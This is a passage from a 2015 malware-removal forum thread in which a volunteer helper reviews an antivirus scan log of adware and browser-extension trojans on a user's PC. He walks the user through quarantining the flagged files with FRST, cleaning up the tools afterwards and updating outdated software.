# compatibility_mode=5895 16777213 100 100 4625710 52036664 0 0
# scanned=193600
# found=26
# cleaned=0
# scan_time=3951
sh=29720E7A15CE7DF0A30D938E133FEDF2B259EF5B ft=1 fh=878238167f8758f6 vn="Win32/BrowseFox.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\6eaeb8afe4d94df5b9d7.dll.vir"
sh=C1B5E924562930AB658499B8F5591C747AEA1933 ft=1 fh=453726dd1a07cb0b vn="Win64/BrowseFox.C potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\6eaeb8afe4d94df5b9d764.dll.vir"
sh=A7A00EA25E5F172BFE727E9F360A234363FC3E3B ft=1 fh=793167af05290924 vn="a variant of Win32/BrowseFox.P potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\KrabWeb.BrowserAdapter.exe.vir"
sh=FB0C95AF84C771C1D8B7F395BD85B692B642C697 ft=1 fh=b185f36530b39741 vn="Win64/BrowseFox.B potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\KrabWeb.BrowserAdapter64.exe.vir"
sh=CAB08ED851D46001657C62AF82BD33176CE801F2 ft=1 fh=12b308dacf2d4901 vn="a variant of MSIL/BrowseFox.H potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\utilKrabWeb.exe.vir"
sh=2D329A7C0B99AA9A44078ABE1F0B6EF5F4252EFD ft=1 fh=e050f3f402504430 vn="a variant of Win32/BrowseFox.M potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\{6eaeb8af-e4d9-4df5-b9d7-815f2928cdf7}.dll.vir"
sh=100C66B9D88006C7B0F9A3AFD7CBCA1F1D39714F ft=1 fh=cffbbcb143a4c7fb vn="Win64/BrowseFox.D potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Krab Web\bin\{6eaeb8af-e4d9-4df5-b9d7-815f2928cdf7}64.dll.vir"
sh=72AA09658B436C44278385E9FCDEC1BB877435F6 ft=1 fh=e7dbf0fed70925c0 vn="a variant of Win32/ReImageRepair.D potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Reimage\Reimage Repair\Reimage.exe.vir"
sh=45E7449F1A82158B429BE44611AE49BCEFDAB6E1 ft=1 fh=dffb77abfb1a8bfc vn="Win32/ReImageRepair.F potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Reimage\Reimage Repair\ReimageRepair.exe.vir"
sh=01D253F0ECFA187BBDFD2707D458CC80494C3BA4 ft=1 fh=0192370b324df6e9 vn="Win32/Toolbar.BitCocktail.C potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\Shop For Rewards\jvwn.dll.vir"
sh=1A013B290CD05590B18E77F40DD67E8C530019EA ft=1 fh=9bf57077d1ee696f vn="a variant of MSIL/Adware.PullUpdate.H application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Browser\prompt.exe.vir"
sh=0D0E4E754838A74CDF95A909136287A8CEE3A91D ft=0 fh=0000000000000000 vn="Win32/Adware.MultiPlug.EK application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu\content\bg.js.vir"
sh=91A146EAC115BD69B6678A539FB623F6A7C33B7A ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org\content\bg.js.vir"
sh=AD3EB5C38E33919317F46331E93E669105497F07 ft=1 fh=f28f6a642fe78f79 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\ctypes\FirefoxCtype.dll.vir"
sh=545537DD6DF32D4ADCA7CD093735EB727CF3B98E ft=1 fh=c14d1e35487b28c7 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\Plugins\npFirefoxPlugin.dll.vir"
sh=45E7449F1A82158B429BE44611AE49BCEFDAB6E1 ft=1 fh=dffb77abfb1a8bfc vn="Win32/ReImageRepair.F potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Angel\Documents\ReimageRepair.exe.vir"
sh=B2656757D4A5A37376EFD5F5929EEC0DFF21D317 ft=1 fh=d782dbdccb214522 vn="a variant of Win32/NetFilter.A potentially unsafe application" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\netfilter.sys.vir"
sh=D158E372F3ACE0D674E7BD1273C59973065F4851 ft=1 fh=c71c00119649f099 vn="a variant of Win32/Adware.Salus.A application" ac=I fn="C:\FRST\Quarantine\C\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe"
sh=7C93024A49DDCCD047B4BD1CE1166BA28DC027BA ft=1 fh=fb61a40f94e47156 vn="a variant of Win32/Adware.Salus.B application" ac=I fn="C:\FRST\Quarantine\C\Program Files\Smgy0ntk1mjjizdb\uninstall.exe"
sh=1AE9177D993D85533746A93CCD00C3FE1C3C527D ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js"
sh=8E50F8086353595072BFD9F8BFBBD8880445510A ft=0 fh=0000000000000000 vn="JS/Kryptik.ATL trojan" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js"
sh=AD3EB5C38E33919317F46331E93E669105497F07 ft=1 fh=f28f6a642fe78f79 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\ctypes\FirefoxCtype.dll"
sh=545537DD6DF32D4ADCA7CD093735EB727CF3B98E ft=1 fh=c14d1e35487b28c7 vn="a variant of Win32/Conduit.SearchProtect.N potentially unwanted application" ac=I fn="C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}\Plugins\npFirefoxPlugin.dll"
sh=D554FB8FC5575CE755DE54D99B43B9FE4D0C711D ft=1 fh=0140ebeac6bfedb8 vn="a variant of Win32/InstallCore.PK potentially unwanted application" ac=I fn="C:\Users\Angel\Downloads\Adobe_Reader_Setup.exe"
sh=DBD6CD321F98F235991B05130B93DDBFE74AAEFD ft=1 fh=3a9dd407a9c5067b vn="Win32/Bundled.Toolbar.Google.D potentially unsafe application" ac=I fn="C:\Users\Angel\Downloads\ccsetup504pro.exe"
sh=34C968D19DFB7D6D103B2D15C9BA7E6333C74F24 ft=0 fh=0000000000000000 vn="a variant of MSIL/Toolbar.Linkury.G potentially unwanted application" ac=I fn="C:\Windows\Installer\79400.msi"
 
And so far, so good. No pop ups or hijacks to report..


#8 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 16 April 2015 - 12:23 PM

Hi there,

Step 1

frst.pngfrstfix.png

Press thew7.png + R on your keyboard at the same time. Type notepad and click OK.

  • Copy the entire content of the codebox below and paste into the notepad document:
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js
    C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
    C:\Windows\Installer\79400.msi
    
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please post it to your reply.

That's it! abklatsch.gif
Your logs look clean to me at the moment. :thumbup2:
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody, however...
If I have helped you fix your PC, then please consider donating to continue the fight against malware: btn_donate_SM.gif
Thank you!


Clean Upcleanupm.PNG

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:

  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Download delfix.pngDelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.

Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:



Adobe Flash Player 16 ActiveX
Adobe Flash Player 16 NPAPI
Adobe Reader X (10.1.13)
Java 7 Update 55
Java™ 6 Update 7


Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#9 SereneSnake

SereneSnake
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:30 AM

Posted 17 April 2015 - 05:19 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 15-04-2015 04
Ran by Angel at 2015-04-17 17:17:50 Run:2
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
C:\Windows\Installer\79400.msi
*****************
 
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\oe6w6h@xqxq-a.org\content\bg.js => Moved successfully.
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\staged\w3hek_hpdw@vpqv-.edu\content\bg.js => Moved successfully.
C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} => Moved successfully.
C:\Windows\Installer\79400.msi => Moved successfully.
 
==== End of Fixlog 17:17:50 ====
 
Thank You SOOO much for your help! My sister and I appreciate it!


#10 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 17 April 2015 - 11:54 PM

You are welcome. Take care.


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#11 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 17 April 2015 - 11:54 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users